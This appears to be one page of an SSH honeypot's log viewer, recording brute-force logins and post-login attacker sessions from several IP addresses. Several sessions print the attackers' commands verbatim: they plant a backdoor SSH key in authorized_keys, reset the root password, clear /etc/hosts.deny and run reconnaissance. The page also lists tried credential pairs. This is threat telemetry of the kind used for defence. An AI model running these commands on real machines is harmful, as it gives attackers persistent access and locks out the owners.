nonproductions.net banner
Logo
Subsystem: NO BONK

Adversarial Observation Interface

Page 311 / 1975 (98737 total records)
Passive Observation Node - Active Operational Overview
14.103.117.98
2026-05-16 23:11:37.337374 UTC
SCORE: 10

Autonomous probing activity normalized. Remote entity established connection but deferred authentication.

Record ID: 510310d30705
Client Version: SSH-2.0-libssh_0.9.6
Engagement Duration: 2m 0s
{
  "id": "510310d30705",
  "src_ip": "14.103.117.98",
  "start_time": "2026-05-16T23:11:37.337374Z",
  "end_time": "2026-05-16T23:13:37.343502Z",
  "duration": "120.0",
  "version": "SSH-2.0-libssh_0.9.6",
  "hassh": null,
  "attempts": [],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 10,
  "tags": []
}
14.103.117.98
2026-05-16 23:11:28.898678 UTC
SCORE: 10

Autonomous probing activity normalized. Remote entity established connection but deferred authentication.

Record ID: b96cde294b22
Client Version: SSH-2.0-libssh_0.9.6
Engagement Duration: 2m 0s
{
  "id": "b96cde294b22",
  "src_ip": "14.103.117.98",
  "start_time": "2026-05-16T23:11:28.898678Z",
  "end_time": "2026-05-16T23:13:28.907298Z",
  "duration": "120.0",
  "version": "SSH-2.0-libssh_0.9.6",
  "hassh": null,
  "attempts": [],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 10,
  "tags": []
}
14.103.117.98
2026-05-16 23:11:24.268290 UTC
COMMANDS RUN SUCCESSFUL LOGIN RECONNAISSANCE SCORE: 340

Credential acceptance event recorded. Target authentication: root / Mo123456

Remote entity achieved interactive shell state. Command sequence (19 executed):

[obs-node]:~$ cd ~; chattr -ia .ssh; lockr -ia .ssh
Command not found: lockr -ia .ssh
[obs-node]:~$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
[obs-node]:~$ cat /proc/cpuinfo | grep name | wc -l
[obs-node]:~$ echo "root:hUe7bopLRmPJ"|chpasswd|bash
[obs-node]:~$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;
[obs-node]:~$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
[obs-node]:~$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
[obs-node]:~$ ls -lh $(which ls)
[obs-node]:~$ which ls
[obs-node]:~$ crontab -l
[obs-node]:~$ w
[obs-node]:~$ uname -m
[obs-node]:~$ cat /proc/cpuinfo | grep model | grep name | wc -l
[obs-node]:~$ top
[obs-node]:~$ uname
[obs-node]:~$ uname -a
[obs-node]:~$ whoami
[obs-node]:~$ lscpu | grep Model
[obs-node]:~$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
Record ID: 0b88839af522
Client Version: SSH-2.0-libssh_0.9.6
Engagement Duration: 28.8s
HASSH Fingerprint: f555226df1963d1d3c09daf865abdc9a
{
  "id": "0b88839af522",
  "src_ip": "14.103.117.98",
  "start_time": "2026-05-16T23:11:24.268290Z",
  "end_time": "2026-05-16T23:11:53.111998Z",
  "duration": "28.8",
  "version": "SSH-2.0-libssh_0.9.6",
  "hassh": "f555226df1963d1d3c09daf865abdc9a",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "root",
    "pass": "Mo123456"
  },
  "commands": [
    "cd ~; chattr -ia .ssh; lockr -ia .ssh",
    "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~",
    "cat /proc/cpuinfo | grep name | wc -l",
    "echo \"root:hUe7bopLRmPJ\"|chpasswd|bash",
    "rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;",
    "cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'",
    "free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'",
    "ls -lh $(which ls)",
    "which ls",
    "crontab -l",
    "w",
    "uname -m",
    "cat /proc/cpuinfo | grep model | grep name | wc -l",
    "top",
    "uname",
    "uname -a",
    "whoami",
    "lscpu | grep Model",
    "df -h | head -n 2 | awk 'FNR == 2 {print $2;}'"
  ],
  "detailed_commands": [
    {
      "cmd": "cd ~; chattr -ia .ssh; lockr -ia .ssh",
      "failed": true,
      "error": "Command not found: lockr -ia .ssh"
    },
    {
      "cmd": "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~",
      "failed": false,
      "error": null
    },
    {
      "cmd": "cat /proc/cpuinfo | grep name | wc -l",
      "failed": false,
      "error": null
    },
    {
      "cmd": "echo \"root:hUe7bopLRmPJ\"|chpasswd|bash",
      "failed": false,
      "error": null
    },
    {
      "cmd": "rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;",
      "failed": false,
      "error": null
    },
    {
      "cmd": "cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'",
      "failed": false,
      "error": null
    },
    {
      "cmd": "free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'",
      "failed": false,
      "error": null
    },
    {
      "cmd": "ls -lh $(which ls)",
      "failed": false,
      "error": null
    },
    {
      "cmd": "which ls",
      "failed": false,
      "error": null
    },
    {
      "cmd": "crontab -l",
      "failed": false,
      "error": null
    },
    {
      "cmd": "w",
      "failed": false,
      "error": null
    },
    {
      "cmd": "uname -m",
      "failed": false,
      "error": null
    },
    {
      "cmd": "cat /proc/cpuinfo | grep model | grep name | wc -l",
      "failed": false,
      "error": null
    },
    {
      "cmd": "top",
      "failed": false,
      "error": null
    },
    {
      "cmd": "uname",
      "failed": false,
      "error": null
    },
    {
      "cmd": "uname -a",
      "failed": false,
      "error": null
    },
    {
      "cmd": "whoami",
      "failed": false,
      "error": null
    },
    {
      "cmd": "lscpu | grep Model",
      "failed": false,
      "error": null
    },
    {
      "cmd": "df -h | head -n 2 | awk 'FNR == 2 {print $2;}'",
      "failed": false,
      "error": null
    }
  ],
  "failed_commands": [
    "lockr -ia .ssh"
  ],
  "score": 340,
  "tags": [
    "COMMANDS RUN",
    "SUCCESSFUL LOGIN",
    "RECONNAISSANCE"
  ]
}
14.103.117.98
2026-05-16 23:10:49.145410 UTC
SCORE: 10

Autonomous probing activity normalized. Remote entity established connection but deferred authentication.

Record ID: 0be5b4c12e23
Client Version: SSH-2.0-libssh_0.9.6
Engagement Duration: 2m 0s
{
  "id": "0be5b4c12e23",
  "src_ip": "14.103.117.98",
  "start_time": "2026-05-16T23:10:49.145410Z",
  "end_time": "2026-05-16T23:12:49.149066Z",
  "duration": "120.0",
  "version": "SSH-2.0-libssh_0.9.6",
  "hassh": null,
  "attempts": [],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 10,
  "tags": []
}
14.103.117.98
2026-05-16 23:10:36.425978 UTC
COMMANDS RUN SUCCESSFUL LOGIN RECONNAISSANCE SCORE: 340

Credential acceptance event recorded. Target authentication: root / None

Remote entity achieved interactive shell state. Command sequence (19 executed):

[obs-node]:~$ cd ~; chattr -ia .ssh; lockr -ia .ssh
Command not found: lockr -ia .ssh
[obs-node]:~$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
[obs-node]:~$ cat /proc/cpuinfo | grep name | wc -l
[obs-node]:~$ echo "root:WsSKDTujgkHu"|chpasswd|bash
[obs-node]:~$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;
[obs-node]:~$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
[obs-node]:~$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
[obs-node]:~$ ls -lh $(which ls)
[obs-node]:~$ which ls
[obs-node]:~$ crontab -l
[obs-node]:~$ w
[obs-node]:~$ uname -m
[obs-node]:~$ cat /proc/cpuinfo | grep model | grep name | wc -l
[obs-node]:~$ top
[obs-node]:~$ uname
[obs-node]:~$ uname -a
[obs-node]:~$ whoami
[obs-node]:~$ lscpu | grep Model
[obs-node]:~$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
Record ID: 8f4bad85df19
Client Version: SSH-2.0-libssh_0.9.6
Engagement Duration: 29.1s
HASSH Fingerprint: f555226df1963d1d3c09daf865abdc9a
{
  "id": "8f4bad85df19",
  "src_ip": "14.103.117.98",
  "start_time": "2026-05-16T23:10:36.425978Z",
  "end_time": "2026-05-16T23:11:05.484563Z",
  "duration": "29.1",
  "version": "SSH-2.0-libssh_0.9.6",
  "hassh": "f555226df1963d1d3c09daf865abdc9a",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "root",
    "pass": "None"
  },
  "commands": [
    "cd ~; chattr -ia .ssh; lockr -ia .ssh",
    "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~",
    "cat /proc/cpuinfo | grep name | wc -l",
    "echo \"root:WsSKDTujgkHu\"|chpasswd|bash",
    "rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;",
    "cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'",
    "free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'",
    "ls -lh $(which ls)",
    "which ls",
    "crontab -l",
    "w",
    "uname -m",
    "cat /proc/cpuinfo | grep model | grep name | wc -l",
    "top",
    "uname",
    "uname -a",
    "whoami",
    "lscpu | grep Model",
    "df -h | head -n 2 | awk 'FNR == 2 {print $2;}'"
  ],
  "detailed_commands": [
    {
      "cmd": "cd ~; chattr -ia .ssh; lockr -ia .ssh",
      "failed": true,
      "error": "Command not found: lockr -ia .ssh"
    },
    {
      "cmd": "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~",
      "failed": false,
      "error": null
    },
    {
      "cmd": "cat /proc/cpuinfo | grep name | wc -l",
      "failed": false,
      "error": null
    },
    {
      "cmd": "echo \"root:WsSKDTujgkHu\"|chpasswd|bash",
      "failed": false,
      "error": null
    },
    {
      "cmd": "rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;",
      "failed": false,
      "error": null
    },
    {
      "cmd": "cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'",
      "failed": false,
      "error": null
    },
    {
      "cmd": "free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'",
      "failed": false,
      "error": null
    },
    {
      "cmd": "ls -lh $(which ls)",
      "failed": false,
      "error": null
    },
    {
      "cmd": "which ls",
      "failed": false,
      "error": null
    },
    {
      "cmd": "crontab -l",
      "failed": false,
      "error": null
    },
    {
      "cmd": "w",
      "failed": false,
      "error": null
    },
    {
      "cmd": "uname -m",
      "failed": false,
      "error": null
    },
    {
      "cmd": "cat /proc/cpuinfo | grep model | grep name | wc -l",
      "failed": false,
      "error": null
    },
    {
      "cmd": "top",
      "failed": false,
      "error": null
    },
    {
      "cmd": "uname",
      "failed": false,
      "error": null
    },
    {
      "cmd": "uname -a",
      "failed": false,
      "error": null
    },
    {
      "cmd": "whoami",
      "failed": false,
      "error": null
    },
    {
      "cmd": "lscpu | grep Model",
      "failed": false,
      "error": null
    },
    {
      "cmd": "df -h | head -n 2 | awk 'FNR == 2 {print $2;}'",
      "failed": false,
      "error": null
    }
  ],
  "failed_commands": [
    "lockr -ia .ssh"
  ],
  "score": 340,
  "tags": [
    "COMMANDS RUN",
    "SUCCESSFUL LOGIN",
    "RECONNAISSANCE"
  ]
}
14.103.117.98
2026-05-16 23:09:50.968728 UTC
SCORE: 10

Autonomous probing activity normalized. Remote entity established connection but deferred authentication.

Record ID: 1564a7f2c633
Client Version: SSH-2.0-libssh_0.9.6
Engagement Duration: 2m 0s
{
  "id": "1564a7f2c633",
  "src_ip": "14.103.117.98",
  "start_time": "2026-05-16T23:09:50.968728Z",
  "end_time": "2026-05-16T23:11:50.972336Z",
  "duration": "120.0",
  "version": "SSH-2.0-libssh_0.9.6",
  "hassh": null,
  "attempts": [],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 10,
  "tags": []
}
14.103.117.98
2026-05-16 23:09:02.611520 UTC
SCORE: 10

Autonomous probing activity normalized. Remote entity established connection but deferred authentication.

Record ID: 0e5c5fb68833
Client Version: Unknown
Engagement Duration: 2m 0s
{
  "id": "0e5c5fb68833",
  "src_ip": "14.103.117.98",
  "start_time": "2026-05-16T23:09:02.611520Z",
  "end_time": "2026-05-16T23:11:02.615609Z",
  "duration": "120.0",
  "version": null,
  "hassh": null,
  "attempts": [],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 10,
  "tags": []
}
45.153.34.97
2026-05-16 23:08:00.850855 UTC
SUCCESSFUL LOGIN SCORE: 50

Credential acceptance event recorded. Target authentication: root / ankurkudintzi

Record ID: 81affe9a2b00
Client Version: SSH-2.0-Go
Engagement Duration: 1.4s
HASSH Fingerprint: 16443846184eafde36765c9bab2f4397
{
  "id": "81affe9a2b00",
  "src_ip": "45.153.34.97",
  "start_time": "2026-05-16T23:08:00.850855Z",
  "end_time": "2026-05-16T23:08:02.251546Z",
  "duration": "1.4",
  "version": "SSH-2.0-Go",
  "hassh": "16443846184eafde36765c9bab2f4397",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "root",
    "pass": "ankurkudintzi"
  },
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 50,
  "tags": [
    "SUCCESSFUL LOGIN"
  ]
}
45.153.34.97
2026-05-16 23:07:45.158329 UTC
SCORE: 0

Autonomous probing activity normalized. Remote entity established connection but deferred authentication.

Record ID: 84b70139f755
Client Version: Unknown
Engagement Duration: 0.1s
{
  "id": "84b70139f755",
  "src_ip": "45.153.34.97",
  "start_time": "2026-05-16T23:07:45.158329Z",
  "end_time": "2026-05-16T23:07:45.309625Z",
  "duration": "0.1",
  "version": null,
  "hassh": null,
  "attempts": [],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": []
}
157.230.190.155
2026-05-16 23:07:45.003839 UTC
FAILED LOGIN SCORE: 0

Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: sam

Record ID: 8a7878e8f2ba
Client Version: SSH-2.0-libssh_0.9.6
Engagement Duration: 1.4s
HASSH Fingerprint: f555226df1963d1d3c09daf865abdc9a
{
  "id": "8a7878e8f2ba",
  "src_ip": "157.230.190.155",
  "start_time": "2026-05-16T23:07:45.003839Z",
  "end_time": "2026-05-16T23:07:46.433891Z",
  "duration": "1.4",
  "version": "SSH-2.0-libssh_0.9.6",
  "hassh": "f555226df1963d1d3c09daf865abdc9a",
  "attempts": [
    {
      "user": "sam",
      "pass": "sam1234"
    }
  ],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": [
    "FAILED LOGIN"
  ]
}
129.226.154.101
2026-05-16 23:06:27.029770 UTC
SUCCESSFUL LOGIN SCORE: 50

Credential acceptance event recorded. Target authentication: root / 3245gs5662d34

Record ID: 845cfd7a0b9a
Client Version: SSH-2.0-libssh_0.9.6
Engagement Duration: 1.1s
HASSH Fingerprint: f555226df1963d1d3c09daf865abdc9a
{
  "id": "845cfd7a0b9a",
  "src_ip": "129.226.154.101",
  "start_time": "2026-05-16T23:06:27.029770Z",
  "end_time": "2026-05-16T23:06:28.166984Z",
  "duration": "1.1",
  "version": "SSH-2.0-libssh_0.9.6",
  "hassh": "f555226df1963d1d3c09daf865abdc9a",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "root",
    "pass": "3245gs5662d34"
  },
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 50,
  "tags": [
    "SUCCESSFUL LOGIN"
  ]
}
129.226.154.101
2026-05-16 23:06:24.711635 UTC
FAILED LOGIN SCORE: 0

Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: 345gs5662d34

Record ID: 75773fce466e
Client Version: SSH-2.0-libssh_0.9.6
Engagement Duration: 2.1s
HASSH Fingerprint: f555226df1963d1d3c09daf865abdc9a
{
  "id": "75773fce466e",
  "src_ip": "129.226.154.101",
  "start_time": "2026-05-16T23:06:24.711635Z",
  "end_time": "2026-05-16T23:06:26.849552Z",
  "duration": "2.1",
  "version": "SSH-2.0-libssh_0.9.6",
  "hassh": "f555226df1963d1d3c09daf865abdc9a",
  "attempts": [
    {
      "user": "345gs5662d34",
      "pass": "345gs5662d34"
    }
  ],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": [
    "FAILED LOGIN"
  ]
}
129.226.154.101
2026-05-16 23:06:22.360287 UTC
COMMANDS RUN SUCCESSFUL LOGIN SCORE: 80

Credential acceptance event recorded. Target authentication: root / 20192019

Remote entity achieved interactive shell state. Command sequence (2 executed):

[obs-node]:~$ cd ~; chattr -ia .ssh; lockr -ia .ssh
Command not found: lockr -ia .ssh
[obs-node]:~$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
Record ID: 2decb9298c15
Client Version: SSH-2.0-libssh_0.9.6
Engagement Duration: 5.8s
HASSH Fingerprint: f555226df1963d1d3c09daf865abdc9a
{
  "id": "2decb9298c15",
  "src_ip": "129.226.154.101",
  "start_time": "2026-05-16T23:06:22.360287Z",
  "end_time": "2026-05-16T23:06:28.163268Z",
  "duration": "5.8",
  "version": "SSH-2.0-libssh_0.9.6",
  "hassh": "f555226df1963d1d3c09daf865abdc9a",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "root",
    "pass": "20192019"
  },
  "commands": [
    "cd ~; chattr -ia .ssh; lockr -ia .ssh",
    "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~"
  ],
  "detailed_commands": [
    {
      "cmd": "cd ~; chattr -ia .ssh; lockr -ia .ssh",
      "failed": true,
      "error": "Command not found: lockr -ia .ssh"
    },
    {
      "cmd": "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~",
      "failed": false,
      "error": null
    }
  ],
  "failed_commands": [
    "lockr -ia .ssh"
  ],
  "score": 80,
  "tags": [
    "COMMANDS RUN",
    "SUCCESSFUL LOGIN"
  ]
}
14.103.117.98
2026-05-16 23:03:51.440077 UTC
FAILED LOGIN SCORE: 0

Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: git

Record ID: bae750878795
Client Version: SSH-2.0-libssh_0.9.6
Engagement Duration: 2.9s
HASSH Fingerprint: f555226df1963d1d3c09daf865abdc9a
{
  "id": "bae750878795",
  "src_ip": "14.103.117.98",
  "start_time": "2026-05-16T23:03:51.440077Z",
  "end_time": "2026-05-16T23:03:54.300484Z",
  "duration": "2.9",
  "version": "SSH-2.0-libssh_0.9.6",
  "hassh": "f555226df1963d1d3c09daf865abdc9a",
  "attempts": [
    {
      "user": "git",
      "pass": "Pa$$w0rd"
    }
  ],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": [
    "FAILED LOGIN"
  ]
}
179.102.26.14
2026-05-16 23:02:19.700065 UTC
SUCCESSFUL LOGIN SCORE: 50

Credential acceptance event recorded. Target authentication: root / 3245gs5662d34

Record ID: 8d2c54950b0a
Client Version: SSH-2.0-libssh_0.11.1
Engagement Duration: 1.1s
HASSH Fingerprint: 03a80b21afa810682a776a7d42e5e6fb
{
  "id": "8d2c54950b0a",
  "src_ip": "179.102.26.14",
  "start_time": "2026-05-16T23:02:19.700065Z",
  "end_time": "2026-05-16T23:02:20.833229Z",
  "duration": "1.1",
  "version": "SSH-2.0-libssh_0.11.1",
  "hassh": "03a80b21afa810682a776a7d42e5e6fb",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "root",
    "pass": "3245gs5662d34"
  },
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 50,
  "tags": [
    "SUCCESSFUL LOGIN"
  ]
}
179.102.26.14
2026-05-16 23:02:17.345329 UTC
FAILED LOGIN SCORE: 0

Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: 345gs5662d34

Record ID: c8d4d0d34dd7
Client Version: SSH-2.0-libssh_0.11.1
Engagement Duration: 2.2s
HASSH Fingerprint: 03a80b21afa810682a776a7d42e5e6fb
{
  "id": "c8d4d0d34dd7",
  "src_ip": "179.102.26.14",
  "start_time": "2026-05-16T23:02:17.345329Z",
  "end_time": "2026-05-16T23:02:19.511950Z",
  "duration": "2.2",
  "version": "SSH-2.0-libssh_0.11.1",
  "hassh": "03a80b21afa810682a776a7d42e5e6fb",
  "attempts": [
    {
      "user": "345gs5662d34",
      "pass": "345gs5662d34"
    }
  ],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": [
    "FAILED LOGIN"
  ]
}
179.102.26.14
2026-05-16 23:02:14.965047 UTC
COMMANDS RUN SUCCESSFUL LOGIN SCORE: 80

Credential acceptance event recorded. Target authentication: root / Aa12345678.

Remote entity achieved interactive shell state. Command sequence (2 executed):

[obs-node]:~$ cd ~; chattr -ia .ssh; lockr -ia .ssh
Command not found: lockr -ia .ssh
